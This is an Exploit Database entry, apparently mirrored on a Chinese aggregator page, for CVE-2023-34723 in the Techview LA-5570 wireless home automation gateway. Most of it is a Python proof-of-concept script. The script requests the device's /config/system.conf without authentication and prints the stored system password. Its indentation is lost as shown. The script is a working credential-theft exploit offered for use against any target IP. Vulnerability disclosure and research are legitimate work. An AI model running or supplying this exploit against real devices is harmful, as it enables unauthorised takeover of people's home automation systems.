Techview LA-5570 Wireless Gateway Home Automation Controller – Multiple Vulnerabilities

• Exploit Database
• 17 阅读

• 作者： The Security Team [exploitsecurity.io]
  日期： 2023-09-08
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51720/

• # Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities
  # Google Dork: N/A
  # Date: 25/08/2023
  # Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]
  # Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570
  # Software Link: N/A
  # Version: 1.0.19_T53
  # Tested on: MACOS/Linux
  # CVE : CVE-2023-34723
  # POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725
  
  #!/opt/homebrew/bin/python3
  
  import requests
  import sys
  from time import sleep
  from urllib3.exceptions import InsecureRequestWarning
  from colorama import init
  from colorama import Fore, Back, Style
  import re
  import os
  import ipaddress
  requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
  
  def banner():
  if os.name == 'posix':
  clr_cmd = ('clear')
  elif os.name == 'nt':
  clr_cmd = ('cls')
  os.system(clr_cmd)
  print ("[+]****************************************************[+]")
  print (" | Author: The Security Team|")
  print (" | Company : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")
  print (" | Description : TechVIEW LA-5570 Directory Traversal |")
  print (" | Usage : "+sys.argv[0]+" <target>|") 
  print ("[+]****************************************************[+]")
  
  def usage():
  print (f"Usage: {sys.argv[0]} <target>")
  
  def main(target):
  domain = "http://"+target+"/config/system.conf"
  try:
  url = domain.strip()
  r = requests.get(url, verify=False, timeout=3)
  print ("[+] Retrieving credentials", flush=True, end='')
  sleep(1)
  print(" .", flush=True, end='')
  sleep(1)
  print(" .", flush=True, end='')
  sleep(1)
  print(" .", flush=True, end='')
  if ("system_password" in r.text):
  data =(r.text.split("\n"))
  print (f"\n{data[1]}")
  else:
  print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)
  except TimeoutError:
  print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
  except KeyboardInterrupt:
  return
  except requests.exceptions.Timeout:
  print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
  return
  
  if __name__ == '__main__':
  if len(sys.argv)>1:
  banner()
  target = sys.argv[1]
  try:
  validate = ipaddress.ip_address(target)
  if (validate):
  main (target)
  except ValueError as e:
  print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL) 
  else:
  print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)